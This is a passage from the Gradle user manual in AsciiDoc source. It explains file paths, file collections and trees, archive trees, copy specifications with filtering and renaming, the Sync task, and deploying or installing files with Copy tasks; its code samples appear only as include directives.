argument:\n\n.Locating files\n====\ninclude::sample[dir=\"snippets\/files\/file\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/file\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nAs you can see, you can pass strings, `File` instances and `{javaApi}\/java\/nio\/file\/Path.html[Path]` instances to the `file()` method, all of which result in an absolute `File` object. You can find other options for argument types in the reference guide, linked in the previous paragraph.\n\nWhat happens in the case of multi-project builds? The `file()` method will always turn relative paths into paths that are relative to the current project directory, which may be a child project. If you want to use a path that's relative to the _root project_ directory, then you need to use the special link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:rootDir[Project.getRootDir()] property to construct an absolute path, like so:\n\n.Creating a path relative to a parent project\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\/project2\",files=\"build.gradle[tags=using-root-dir-property]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\/project2\",files=\"build.gradle.kts[tags=using-root-dir-property]\"]\n====\n\nLet's say you're working on a multi-project build in a `dev\/projects\/AcmeHealth` directory. You use the above example in the build of the library you're fixing \u2014 at `AcmeHealth\/subprojects\/AcmePatientRecordLib\/build.gradle`. The file path will resolve to the absolute version of `dev\/projects\/AcmeHealth\/shared\/config.xml`.\n\nThe `file()` method can be used to configure any task that has a property of type `File`. Many tasks, though, work on multiple files, so we look at how to specify sets of files next.\n\n[[sec:file_collections]]\n=== File collections\n\nA _file collection_ is simply a set of file paths that's represented by the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html[FileCollection] interface. _Any_ file paths.\nIt's important to understand that the file paths don't have to be related in any way, so they don't have to be in the same directory or even have a shared parent directory.\nYou will also find that many parts of the Gradle API use `FileCollection`, such as the copying API discussed later in this chapter and <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configurations>>.\n\nThe recommended way to specify a collection of files is to use the link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] method, which returns a `FileCollection` instance.\nThis method is very flexible and allows you to pass multiple strings, `File` instances, collections of strings, collections of ``File``s, and more.\nYou can even pass in tasks as arguments if they have <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>.\nLearn about all the supported argument types in the reference guide.\n\n[CAUTION]\n====\nAlthough the `files()` method accepts `File` instances, never use `new File(relative path)` with it because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nAs with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method covered in the <<#sec:single_file_paths,previous section>>, all relative paths are evaluated relative to the current project directory. The following example demonstrates some of the variety of argument types you can use \u2014 strings, `File` instances, a list and a `{javaApi}\/java\/nio\/file\/Path.html[Path]`:\n\n.Creating a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nFile collections have some important attributes in Gradle. They can be:\n\n * created lazily\n * iterated over\n * filtered\n * combined\n\n_Lazy creation_ of a file collection is useful when you need to evaluate the files that make up a collection at the time a build runs. In the following example, we query the file system to find out what files exist in a particular directory and then make those into a file collection:\n\n.Implementing a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=closure]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=closure]\"]\n====\n\n.Output of **`gradle -q list`**\n----\n> gradle -q list\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsWithClosure.out[]\n----\n\nThe key to lazy creation is passing a closure (in Groovy) or a `Provider` (in Kotlin) to the `files()` method. Your closure\/provider simply needs to return a value of a type accepted by `files()`, such as `List<File>`, `String`, `FileCollection`, etc.\n\n_Iterating over a file collection_ can be done through the `each()` method (in Groovy) of `forEach` method (in Kotlin) on the collection or using the collection in a `for` loop. In both approaches, the file collection is treated as a set of `File` instances, i.e. your iteration variable will be of type `File`.\n\nThe following example demonstrates such iteration as well as how you can convert file collections to other types using the `as` operator or supported properties:\n\n.Using a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=usage]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=usage]\"]\n====\n\nYou can also see at the end of the example _how to combine file collections_ using the `+` and `-` operators to merge and subtract them. An important feature of the resulting file collections is that they are _live_. In other words, when you combine file collections in this way, the result always reflects what's currently in the source file collections, even if they change during the build.\n\nFor example, imagine `collection` in the above example gains an extra file or two after `union` is created. As long as you use `union` after those files are added to `collection`, `union` will also contain those additional files. The same goes for the `different` file collection.\n\nLive collections are also important when it comes to _filtering_. If you want to use a subset of a file collection, you can take advantage of the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html#filter-org.gradle.api.specs.Spec-[FileCollection.filter(org.gradle.api.specs.Spec)] method to determine which files to \"keep\". In the following example, we create a new collection that consists of only the files that end with .txt in the source collection:\n\n.Filtering a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=filtering-file-collections]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=filtering-file-collections]\"]\n====\n\n.Output of **`gradle -q filterTextFiles`**\n----\n> gradle -q filterTextFiles\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsFiltering.out[]\n----\n\nIf `collection` changes at any time, either by adding or removing files from itself, then `textFiles` will immediately reflect the change because it is also a live collection. Note that the closure you pass to `filter()` takes a `File` as an argument and should return a boolean.\n\n[[sec:file_trees]]\n=== File trees\n\nA _file tree_ is a file collection that retains the directory structure of the files it contains and has the type link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree]. This means that all the paths in a file tree must have a shared parent directory. The following diagram highlights the distinction between file trees and file collections in the common case of copying files:\n\n.The differences in how file trees and file collections behave when copying files\nimage::file-collection-vs-file-tree.png[]\n\nNOTE: Although `FileTree` extends `FileCollection` (an is-a relationship), their behaviors do differ. In other words, you can use a file tree wherever a file collection is required, but remember: a file collection is a flat list\/set of files, while a file tree is a file and directory hierarchy. To convert a file tree to a flat collection, use the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#getFiles--[FileTree.getFiles()] property.\n\nThe simplest way to create a file tree is to pass a file or directory path to the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:fileTree(java.lang.Object)[Project.fileTree(java.lang.Object)] method. This will create a tree of all the files and directories in that base directory (but not the base directory itself). The following example demonstrates how to use the basic method and, in addition, how to filter the files and directories using Ant-style patterns:\n\n.Creating a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=define]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=define]\"]\n====\n\nYou can see more examples of supported patterns in the API docs for link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. Also, see the API documentation for `fileTree()` to see what types you can pass as the base directory.\n\nBy default, `fileTree()` returns a `FileTree` instance that applies some default exclude patterns for convenience \u2014 the same defaults as Ant in fact. For the complete default exclude list, see http:\/\/ant.apache.org\/manual\/dirtasks.html#defaultexcludes[the Ant manual].\n\n[[sec:change_default_excludes]]\nIf those default excludes prove problematic, you can workaround the issue by changing the default excludes in the settings script:\n\n.Changing default excludes in the settings script\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"settings.gradle[tags=change-default-exclusions]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"settings.gradle.kts[tags=change-default-exclusions]\"]\n====\n\n[NOTE]\n====\nCurrently, Gradle's default excludes are configured via Ant's `DirectoryScanner` class.\n====\n\n[NOTE]\n====\nGradle does not support changing default excludes during the execution phase.\n====\n\nYou can do many of the same things with file trees that you can with file collections:\n\n * iterate over them (depth first)\n * filter them (using link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#matching-org.gradle.api.Action-[FileTree.matching(org.gradle.api.Action)] and Ant-style patterns)\n * merge them\n\nYou can also traverse file trees using the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#visit-org.gradle.api.Action-[FileTree.visit(org.gradle.api.Action)] method. All of these techniques are demonstrated in the following example:\n\n.Using a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=use]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=use]\"]\n====\n\nWe've discussed how to create your own file trees and file collections, but it's also worth bearing in mind that many Gradle plugins provide their own instances of file trees, such as <<building_java_projects.adoc#sec:java_source_sets,Java's source sets>>. These can be used and manipulated in exactly the same way as the file trees you create yourself.\n\nAnother specific type of file tree that users commonly need is the archive, i.e. ZIP files, TAR files, etc. We look at those next.\n\n[[sec:archive_contents]]\n=== Using archives as file trees\n\nAn archive is a directory and file hierarchy packed into a single file. In other words, it's a special case of a file tree, and that's exactly how Gradle treats archives. Instead of using the `fileTree()` method, which only works on normal file systems, you use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)] methods to wrap archive files of the corresponding type (note that JAR, WAR and EAR files are ZIPs). Both methods return `FileTree` instances that you can then use in the same way as normal file trees. For example, you can extract some or all of the files of an archive by copying its contents to some directory on the file system. Or you can merge one archive into another.\n\nHere are some simple examples of creating archive-based file trees:\n\n.Using an archive as a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=archive-trees]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=archive-trees]\"]\n====\n\nYou can see a practical example of extracting an archive file <<#sec:unpacking_archives_example,in among the common scenarios>> we cover.\n\n[[sec:specifying_multiple_files]]\n=== Understanding implicit conversion to file collections\n\nMany objects in Gradle have properties which accept a set of input files.\nFor example, the link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile] task has a `source` property that defines the source files to compile.\nYou can set the value of this property using any of the types supported by the <<#sec:file_collections,files()>> method, as mentioned in the api docs.\nThis means you can, for example, set the property to a `File`, `String`, collection, `FileCollection` or even a closure or `Provider`.\n\n*This is a feature of specific tasks*!\nThat means implicit conversion will not happen for just any task that has a `FileCollection` or `FileTree` property.\nIf you want to know whether implicit conversion happens in a particular situation, you will need to read the relevant documentation, such as the corresponding task's API docs.\nAlternatively, you can remove all doubt by explicitly using link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] in your build.\n\nHere are some examples of the different types of arguments that the `source` property can take:\n\n.Specifying a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=set-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=set-input-files]\"]\n====\n\nOne other thing to note is that properties like `source` have corresponding methods in core Gradle tasks. Those methods follow the convention of _appending_ to collections of values rather than replacing them. Again, this method accepts any of the types supported by the <<#sec:file_collections,files()>> method, as shown here:\n\n.Appending a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=add-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=add-input-files]\"]\n====\n\nAs this is a common convention, we recommend that you follow it in your own custom tasks. Specifically, if you plan to add a method to configure a collection-based property, make sure the method appends rather than replaces values.\n\n[[sec:copying_files]]\n== File copying in depth\n\nThe basic process of copying files in Gradle is a simple one:\n\n * Define a task of type link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy]\n * Specify which files (and potentially directories) to copy\n * Specify a destination for the copied files\n\nBut this apparent simplicity hides a rich API that allows fine-grained control of which files are copied, where they go, and what happens to them as they are copied \u2014 renaming of the files and token substitution of file content are both possibilities, for example.\n\nLet's start with the last two items on the list, which form what is known as a _copy specification_. This is formally based on the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html[CopySpec] interface, which the `Copy` task implements, and offers:\n\n * A link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#from-java.lang.Object++...++-[CopySpec.from(java.lang.Object...)] method to define what to copy\n * An link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#into-java.lang.Object-[CopySpec.into(java.lang.Object)] method to define the destination\n\n`CopySpec` has several additional methods that allow you to control the copying process, but these two are the only required ones. `into()` is straightforward, requiring a directory path as its argument in any form supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method. The `from()` configuration is far more flexible.\n\nNot only does `from()` accept multiple arguments, it also allows several different types of argument. For example, some of the most common types are:\n\n * A `String` \u2014 treated as a file path or, if it starts with \"file:\/\/\", a file URI\n * A `File` \u2014 used as a file path\n * A `FileCollection` or `FileTree` \u2014 all files in the collection are included in the copy\n * A task \u2014\u00a0the files or directories that form a task's <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>> are included\n\nIn fact, `from()` accepts all the same arguments as link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] so see that method for a more detailed list of acceptable types.\n\nSomething else to consider is what type of thing a file path refers to:\n\n * A file \u2014 the file is copied as is\n * A directory \u2014 this is effectively treated as a file tree: everything in it, including subdirectories, is copied. However, the directory itself is not included in the copy.\n * A non-existent file \u2014 the path is ignored\n\nHere is an example that uses multiple `from()` specifications, each with a different argument type. You will probably also notice that `into()` is configured lazily using a closure (in Groovy) or a Provider (in Kotlin) \u2014 a technique that also works with `from()`:\n\n.Specifying copy task source files and destination directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-2]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-2]\"]\n====\n\nNote that the lazy configuration of `into()` is different from a <<#sub:using_child_copy_specifications,child specification>>, even though the syntax is similar. Keep an eye on the number of arguments to distinguish between them.\n\n[[filtering_files]]\n=== Filtering files\n\nYou've already seen that you can filter file collections and file trees directly in a `Copy` task, but you can also apply filtering in any copy specification through the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#include-java.lang.String++...++-[CopySpec.include(java.lang.String...)] and link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#exclude-java.lang.String++...++-[CopySpec.exclude(java.lang.String...)] methods.\n\nBoth of these methods are normally used with Ant-style include or exclude patterns, as described in link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. You can also perform more complex logic by using a closure that takes a link:{javadocPath}\/org\/gradle\/api\/file\/FileTreeElement.html[FileTreeElement] and returns `true` if the file should be included or `false` otherwise. The following example demonstrates both forms, ensuring that only .html and .jsp files are copied, except for those .html files with the word \"DRAFT\" in their content:\n\n.Selecting the files to copy\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-with-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-with-patterns]\"]\n====\n\nA question you may ask yourself at this point is what happens when inclusion and exclusion patterns overlap? Which pattern wins? Here are the basic rules:\n\n * If there are no explicit inclusions or exclusions, everything is included\n * If at least one inclusion is specified, only files and directories matching the patterns are included\n * Any exclusion pattern overrides any inclusions, so if a file or directory matches at least one exclusion pattern, it won't be included, regardless of the inclusion patterns\n\nBear these rules in mind when creating combined inclusion and exclusion specifications so that you end up with the exact behavior you want.\n\nNote that the inclusions and exclusions in the above example will apply to _all_ `from()` configurations. If you want to apply filtering to a subset of the copied files, you'll need to use <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:renaming_files]]\n=== Renaming files\n\nThe <<#sec:renaming_files_example,example of how to rename files on copy>> gives you most of the information you need to perform this operation. It demonstrates the two options for renaming:\n\n * Using a regular expression\n * Using a closure\n\nRegular expressions are a flexible approach to renaming, particularly as Gradle supports regex groups that allow you to remove and replaces parts of the source filename. The following example shows how you can remove the string \"-staging-\" from any filename that contains it using a simple regular expression:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-files]\"]\n====\n\nYou can use any regular expression supported by the Java `{javaApi}\/java\/util\/regex\/Pattern.html[Pattern]` class and the substitution string (the second argument of `rename()` works on the same principles as the `{javaApi}\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[Matcher.appendReplacement()]` method.\n\n.Regular expressions in Groovy build scripts\n[NOTE]\n====\nThere are two common issues people come across when using regular expressions in this context:\n\n 1. If you use a slashy string (those delimited by '\/') for the first argument, you _must_ include the parentheses for `rename()` as shown in the above example.\n 2. It's safest to use single quotes for the second argument, otherwise you need to escape the '$' in group substitutions, i.e. `\"\\$1\\$2\"`\n\nThe first is a minor inconvenience, but slashy strings have the advantage that you don't have to escape backslash ('\\') characters in the regular expression. The second issue stems from Groovy's support for embedded expressions using `${ }` syntax in double-quoted and slashy strings.\n====\n\nThe closure syntax for `rename()` is straightforward and can be used for any requirements that simple regular expressions can't handle. You're given the name of a file and you return a new name for that file, or `null` if you don't want to change the name. Do be aware that the closure will be executed for every file that's copied, so try to avoid expensive operations where possible.\n\n[[sec:filtering_files]]\n=== Filtering file content (token substitution, templating, etc.)\n\nNot to be confused with filtering which files are copied, _file content filtering_ allows you to transform the content of files while they are being copied. This can involve basic templating that uses token substitution, removal of lines of text, or even more complex filtering using a full-blown template engine.\n\nThe following example demonstrates several forms of filtering, including token substitution using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#expand-java.util.Map-[CopySpec.expand(java.util.Map)] method and another using link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#filter-java.lang.Class-[CopySpec.filter(java.lang.Class)] with an https:\/\/ant.apache.org\/manual\/Types\/filterchain.html[Ant filter]:\n\n.Filtering files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=filter-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=filter-files]\"]\n====\n\nThe `filter()` method has two variants, which behave differently:\n\n * one takes a `{javaApi}\/java\/io\/FilterReader.html[FilterReader]` and is designed to work with Ant filters, such as `ReplaceTokens`\n * one takes a closure or link:{javadocPath}\/org\/gradle\/api\/Transformer.html[Transformer] that defines the transformation for each line of the source file\n\nNote that both variants assume the source files are text based. When you use the `ReplaceTokens` class with `filter()`, the result is a template engine that replaces tokens of the form `@tokenName@` (the Ant-style token) with values that you define.\n\nThe `expand()` method treats the source files as https:\/\/docs.groovy-lang.org\/latest\/html\/api\/groovy\/text\/SimpleTemplateEngine.html[Groovy templates], which evaluate and expand expressions of the form `${expression}`. You can pass in property names and values that are then expanded in the source files. `expand()` allows for more than basic token substitution as the embedded expressions are full-blown Groovy expressions.\n\nNOTE: It's good practice to specify the character set when reading and writing the file, otherwise the transformations won't work properly for non-ASCII text. You configure the character set with the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#getFilteringCharset--[CopySpec.getFilteringCharset()] property. If it's not specified, the JVM default character set is used, which is likely to be different from the one you want.\n\n[[sec:using_the_copyspec_class]]\n=== Using the `CopySpec` class\n\nA copy specification (or copy spec for short) determines what gets copied to where, and what happens to files during the copy. You've alread seen many examples in the form of configuration for `Copy` and archiving tasks. But copy specs have two attributes that are worth covering in more detail:\n\n 1. They can be independent of tasks\n 2. They are hierarchical\n\nThe first of these attributes allows you to _share copy specs within a build_. The second provides fine-grained control within the overall copy specification.\n\n[[sub:sharing_copy_specs]]\n==== Sharing copy specs\n\nConsider a build that has several tasks that copy a project's static website resources or add them to an archive. One task might copy the resources to a folder for a local HTTP server and another might package them into a distribution. You could manually specify the file locations and appropriate inclusions each time they are needed, but human error is more likely to creep in, resulting in inconsistencies between tasks.\n\nOne solution Gradle provides is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method. This allows you to create a copy spec outside of a task, which can then be attached to an appropriate task using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#with-org.gradle.api.file.CopySpec++...++-[CopySpec.with(org.gradle.api.file.CopySpec...)] method. The following example demonstrates how this is done:\n\n.Sharing copy specifications\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=standalone-copyspec]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=standalone-copyspec]\"]\n====\n\nBoth the `copyAssets` and `distApp` tasks will process the static resources under `src\/main\/webapp`, as specified by `webAssetsSpec`.\n\n[NOTE]\n====\nThe configuration defined by `webAssetsSpec` will _not_ apply to the app classes included by the `distApp` task. That's because `from appClasses` is its own child specification independent of `with webAssetsSpec`.\n\nThis can be confusing to understand, so it's probably best to treat `with()` as an extra `from()` specification in the task. Hence it doesn't make sense to define a standalone copy spec without at least one `from()` defined.\n====\n\nIf you encounter a scenario in which you want to apply the same copy configuration to _different_ sets of files, then you can share the configuration block directly without using `copySpec()`. Here's an example that has two independent tasks that happen to want to process image files only:\n\n.Sharing copy patterns only\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=shared-copy-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=shared-copy-patterns]\"]\n====\n\nIn this case, we assign the copy configuration to its own variable and apply it to whatever `from()` specification we want. This doesn't just work for inclusions, but also exclusions, file renaming, and file content filtering.\n\n[[sub:using_child_copy_specifications]]\n==== Using child specifications\n\nIf you only use a single copy spec, the file filtering and renaming will apply to _all_ the files that are copied. Sometimes this is what you want, but not always. Consider the following example that copies files into a directory structure that can be used by a Java Servlet container to deliver a website:\n\n.Creating an exploded WAR for a Servlet container\nimage::exploded-war-child-copy-spec-example.png[]\n\nThis is not a straightforward copy as the `WEB-INF` directory and its subdirectories don't exist within the project, so they must be created during the copy. In addition, we only want HTML and image files going directly into the root folder \u2014 `build\/explodedWar` \u2014 and only JavaScript files going into the `js` directory. So we need separate filter patterns for those two sets of files.\n\nThe solution is to use _child specifications_, which can be applied to both `from()` and `into()` declarations. The following task definition does the necessary work:\n\n.Nested copy specs\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=nested-specs]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=nested-specs]\"]\n====\n\nNotice how the `src\/dist` configuration has a nested inclusion specification: that's the child copy spec. You can of course add content filtering and renaming here as required. A child copy spec is still a copy spec.\n\nThe above example also demonstrates how you can copy files into a subdirectory of the destination either by using a child `into()` on a `from()` or a child `from()` on an `into()`. Both approaches are acceptable, but you may want to create and follow a convention to ensure consistency across your build files.\n\n[NOTE]\nDon't get your `into()` specifications mixed up! For a normal copy \u2014\u00a0one to the filesystem rather than an archive \u2014 there should always be _one_ \"root\" `into()` that simply specifies the overall destination directory of the copy. Any other `into()` should have a child spec attached and its path will be relative to the root `into()`.\n\nOne final thing to be aware of is that a child copy spec inherits its destination path, include patterns, exclude patterns, copy actions, name mappings and filters from its parent. So be careful where you place your configuration.\n\n[[sec:project_copy_method]]\n=== Copying files in your own tasks\n\nThere might be occasions when you want to copy files or directories as _part_ of a task. For example, a custom archiving task based on an unsupported archive format might want to copy files to a temporary directory before they are then archived. You still want to take advantage of Gradle's copy API, but without introducing an extra `Copy` task.\n\nThe solution is to use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copy(org.gradle.api.Action)[Project.copy(org.gradle.api.Action)] method. It works the same way as the `Copy` task by configuring it with a copy spec. Here's a trivial example:\n\n.Copying files using the copy() method without up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method]\"]\n====\n\nThe above example demonstrates the basic syntax and also highlights two major limitations of using the `copy()` method:\n\n 1. The `copy()` method is not <<more_about_tasks.adoc#sec:up_to_date_checks,incremental>>. The example's `copyMethod` task will _always_ execute because it has no information about what files make up the task's inputs. You have to manually define the task inputs and outputs.\n\n 2. Using a task as a copy source, i.e. as an argument to `from()`, won't set up an automatic task dependency between your task and that copy source. As such, if you are using the `copy()` method as part of a task action, you must explicitly declare all inputs and outputs in order to get the correct behavior.\n\nThe following example shows you how to workaround these limitations by using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,dynamic API for task inputs and outputs>>:\n\n.Copying files using the copy() method with up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method-with-dependency]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method-with-dependency]\"]\n====\n\nThese limitations make it preferable to use the `Copy` task wherever possible, because of its builtin support for incremental building and task dependency inference. That is why the `copy()` method is intended for use by <<custom_tasks.adoc#custom_tasks,custom tasks>> that need to copy files as part of their function. Custom tasks that use the `copy()` method should declare the necessary inputs and outputs relevant to the copy action.\n\n[[sec:sync_task]]\n=== Mirroring directories and file collections with the `Sync` task\n\nThe link:{groovyDslPath}\/org.gradle.api.tasks.Sync.html[Sync] task, which extends the `Copy` task, copies the source files into the destination directory and then removes any files from the destination directory which it did not copy. In other words, it synchronizes the contents of a directory with its source. This can be useful for doing things such as installing your application, creating an exploded copy of your archives, or maintaining a copy of the project's dependencies.\n\nHere is an example which maintains a copy of the project's runtime dependencies in the `build\/libs` directory.\n\n.Using the Sync task to copy dependencies\n====\ninclude::sample[dir=\"snippets\/files\/sync\/groovy\",files=\"build.gradle[tags=copy-dependencies]\"]\ninclude::sample[dir=\"snippets\/files\/sync\/kotlin\",files=\"build.gradle.kts[tags=copy-dependencies]\"]\n====\n\nYou can also perform the same function in your own tasks with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:sync(org.gradle.api.Action)[Project.sync(org.gradle.api.Action)] method.\n\n[[sec:copy_deploy]]\n=== Deploying single files into application servers\n\nWhen working with application servers, you can use a `Copy` task to deploy the application archive (e.g. a WAR file).\nSince you are deploying a single file, the destination directory of the `Copy` is the whole deployment directory.\nThe deployment directory sometimes does contain unreadable files like named pipes, so Gradle may have problems doing up-to-date checks.\nIn order to support this use-case, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to deploy a WAR file\n====\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:install_executable]]\n=== Installing executables\n\nWhen you are building a standalone executable, you may want to install this file on your system, so it ends up in your path.\nYou can use a `Copy` task to install the executable into shared directories like `\/usr\/local\/bin`.\nThe installation directory probably contains many other executables, some of which may even be unreadable by Gradle.\nTo support the unreadable files in the `Copy` task's destination directory and to avoid time consuming up-to-date checks, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to install an executable\n====\ninclude::sample[dir=\"snippets\/files\/installExecutable\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/installExecutable\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:archives]]\n== Archive creation in depth\n\nArchives are essentially self-contained file systems and Gradle treats them as such. This is why working with archives is very similar to working with files and directories, including such things as file permissions.\n\nOut of the box, Gradle supports creation of both ZIP and TAR archives, and by extension Java's JAR, WAR and EAR formats \u2014\u00a0Java's archive formats are all ZIPs. Each of these formats has a corresponding task type to create them: link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.War.html[War], and link:{groovyDslPath}\/org.gradle.plugins.ear.Ear.html[Ear]. These all work the same way and are based on copy specifications, just like the `Copy` task.\n\nCreating an archive file is essentially a file copy in which the destination is implicit, i.e. the archive file itself. Here's a basic example that specifies the path and name of the target archive file:\n\n.Archiving a directory as a 